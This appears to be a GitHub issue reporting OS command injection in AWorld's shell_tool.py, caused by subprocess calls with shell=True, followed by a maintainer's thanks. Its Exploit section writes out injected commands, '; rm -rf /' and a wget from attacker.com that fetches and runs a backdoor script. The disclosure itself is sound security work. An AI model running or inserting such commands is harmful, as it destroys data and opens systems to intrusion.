Vulnerability Report: OS Command Injection in shell_tool.py due to subprocess.run() and subprocess.Popen() with shell=True

[ybdesire]

Description

In the file AWorld/aworld/virtual_environments/terminals/shell_tool.py, there is a significant security vulnerability of type CWE-78: OS Command Injection. The code uses subprocess.run() and subprocess.Popen() to execute user - input commands, and the shell parameter is set to True. This configuration allows an attacker to inject malicious commands into the input, which can then be executed by the system.

Specifically, in the execute method, when the capture_output parameter is True, the subprocess.run() function is called with shell=True:

process_ = subprocess.run(
    script,
    shell=True,
    cwd=self.working_dir,
    env=self.env,
    timeout=timeout,
    stdout=subprocess.PIPE,
    stderr=subprocess.PIPE,
    text=True
)

When capture_output is False, the subprocess.Popen() function is called with shell=True:

process_ = subprocess.Popen(
    script,
    shell=True,
    cwd=self.working_dir,
    env=self.env
)

Similarly, in the execute_async method, the subprocess.Popen() function is also called with shell=True:

process_ = subprocess.Popen(
    script,
    shell=True,
    cwd=self.working_dir,
    env=self.env
)

This means that any user input passed to these functions can potentially be exploited by an attacker. If an attacker provides malicious input, such as script = 'rm -rf /', the malicious command will be executed, leading to serious consequences such as system damage or data loss.

Related Code

https://github.com/inclusionAI/AWorld/blob/main/aworld/virtual_environments/terminals/shell_tool.py#L166

https://github.com/inclusionAI/AWorld/blob/main/aworld/virtual_environments/terminals/shell_tool.py#L203

Exploit

An attacker can exploit this vulnerability by crafting a malicious input string. For example, if the application has an interface where users can input shell commands, the attacker can enter a command like ; rm -rf / as part of the input. When the application calls the execute or execute_async methods with this malicious input, the semicolon (;) is used to separate the original command from the attacker's malicious command. The original command will be executed first, followed by the rm -rf / command, which will recursively delete all files and directories in the root directory, effectively destroying the system.

In a more practical scenario, an attacker might use a more stealthy approach. For example, they could inject a command to download and execute a backdoor script from a remote server: ; wget http://attacker.com/backdoor.sh && sh backdoor.sh. This would allow the attacker to gain unauthorized access to the system and potentially perform further malicious actions.

[ybdesire]

Impact : all versions of code

[rainsonGain]

Impact : all versions of code

Thank you very much for pointing out the vulnerability. We will fix and improve it as soon as possible.
Welcome to building better and safer tools(MCP servers) and environments together.